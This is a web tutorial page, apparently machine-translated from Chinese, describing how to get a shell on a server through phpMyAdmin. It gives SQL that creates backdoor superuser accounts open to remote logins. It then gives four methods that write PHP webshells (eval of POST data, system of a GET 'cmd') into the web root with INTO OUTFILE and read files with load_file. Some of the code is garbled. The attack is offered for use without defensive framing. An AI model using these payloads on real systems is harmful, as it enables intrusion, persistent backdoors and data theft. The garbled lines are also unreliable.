Summary PHPmyadmin takes shell-phpMyAdmin-php.cn

Home

Database

phpMyAdmin

Summary PHPmyadmin takes shell

藏色散人

Jan 04, 2021 pm 02:37 PM

phpmyadmin

The following is a summary for everyone in the phpmyadmin usage tutorial columnphpmyadminGet the shell, I hope it will be helpful to friends in need!

Summary PHPmyadmin takes shell

PHPmyadmin takes shell summary

PHPmyadmin changes user password

Click directly on localhost or 1270.0.1 above, the user column will appear, click to modify

Add the super user guesssec password ooxx and allow external connections

GRANT ALL PRIVILEGES ON *.* TO &#39;guetsec&#39;@&#39;%&#39; IDENTIFIED BY &#39;ooxx&#39; WITH GRANT OPTION;

Copy after login

We can create a root account and set a password

GRANT ALL PRIVILEGES ON *.* TO &#39;root&#39;@&#39;%&#39; IDENTIFIED BY &#39;123456&#39; WITH GRANT OPTION;

Copy after login

In this way, a root external link account is created, the password is 123456, use 123456 for external links

Four classic methods of using shell:

Method one:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on

Copy after login

Method two:

读取文件内容：    select load_file(&#39;E:/xamp/www/s.php&#39;);
写一句话：    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限：    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Copy after login

Method three:

JhackJ version PHPmyadmin takes shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数： 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。

Copy after login

Method 4:

select load_file(&#39;E:/xamp/www/study.php&#39;);
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Copy after login

Then visit the website directory: http://www.2cto.com/study.php?cmd=dir

Phpmyadmin appears when exporting a sentence (Errcode: 13 - Permission denied)

There is no permission for this directory. You can try the upper-level directory or the lower-level directory

If that doesn’t work, try NTS traffic

Also, pay attention to the directory\

The above is the detailed content of Summary PHPmyadmin takes shell. For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to fix KB5055523 fails to install in Windows 11?

4 weeks ago By DDD

How to fix KB5055518 fails to install in Windows 10?

4 weeks ago By DDD

Roblox: Grow A Garden - Complete Mutation Guide

3 weeks ago By DDD

Roblox: Bubble Gum Simulator Infinity - How To Get And Use Royal Keys

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

How to fix KB5055612 fails to install in Windows 10?

3 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Java Tutorial

1664

CakePHP Tutorial

1421

Laravel Tutorial

1315

PHP Tutorial

1266

C# Tutorial

1239

Related knowledge

How to set primary key in phpmyadmin Apr 07, 2024 pm 02:54 PM

The primary key of a table is one or more columns that uniquely identify each record in the table. Here are the steps to set a primary key: Log in to phpMyAdmin. Select database and table. Check the column you want to use as the primary key. Click "Save Changes". Primary keys provide data integrity, lookup speed, and relationship modeling benefits.

Where is the phpmyadmin log? Apr 07, 2024 pm 12:57 PM

Default location for PHPMyAdmin log files: Linux/Unix/macOS:/var/log/phpmyadminWindows: C:\xampp\phpMyAdmin\logs\ Log file purpose: Troubleshooting Audit Security

How to add foreign keys in phpmyadmin Apr 07, 2024 pm 02:36 PM

Adding a foreign key in phpMyAdmin can be achieved by following these steps: Select the parent table that contains the foreign key. Edit the parent table structure and add new columns in "Columns". Enable foreign key constraints and select the referencing table and key. Set update/delete operations. save Changes.

How to delete data table in phpmyadmin Apr 07, 2024 pm 03:00 PM

Steps to delete a data table in phpMyAdmin: Select the database and data table; click the "Action" tab; select the "Delete" option; confirm and perform the deletion operation.

Where does the wordpress database exist? Apr 15, 2024 pm 10:39 PM

The WordPress database is housed in a MySQL database that stores all website data and can be accessed through your hosting provider’s dashboard, FTP, or phpMyAdmin. The database name is related to the website URL or username, and access requires the use of database credentials, including name, username, password, and hostname, which are typically stored in the "wp-config.php" file.

why phpmyadmin access denied Apr 07, 2024 pm 01:03 PM

Reasons and solutions for access denied by phpMyAdmin: Authentication failed: Check whether the username and password are correct. Server configuration error: adjust firewall settings and check whether the database port is correct. Permissions issue: Granting users access to the database. Session timeout: Refresh the browser page and reconnect. phpMyAdmin configuration error: Check the configuration file and file permissions to make sure the required Apache modules are enabled. Server issue: Wait for a while and try again or contact your hosting provider.

What is the password for the phpmyadmin account? Apr 07, 2024 pm 01:09 PM

The default username and password for PHPMyAdmin are root and empty. For security reasons, it is recommended to change the default password. Method to change password: 1. Log in to PHPMyAdmin; 2. Select "privileges"; 3. Enter the new password and save it. When you forget your password, you can reset it by stopping the MySQL service and editing the configuration file: 1. Add the skip-grant-tables line; 2. Log in to the MySQL command line and reset the root password; 3. Refresh the permission table; 4. Delete skip-grant-tables line, restart the MySQL service.

Where is the associated view of phpmyadmin Apr 07, 2024 pm 01:00 PM

Related views can be found in the Views submenu under the Structure tab in phpMyAdmin. To access them, simply select the database, click the "Structure" tab, and then click the "View" submenu.

See all articles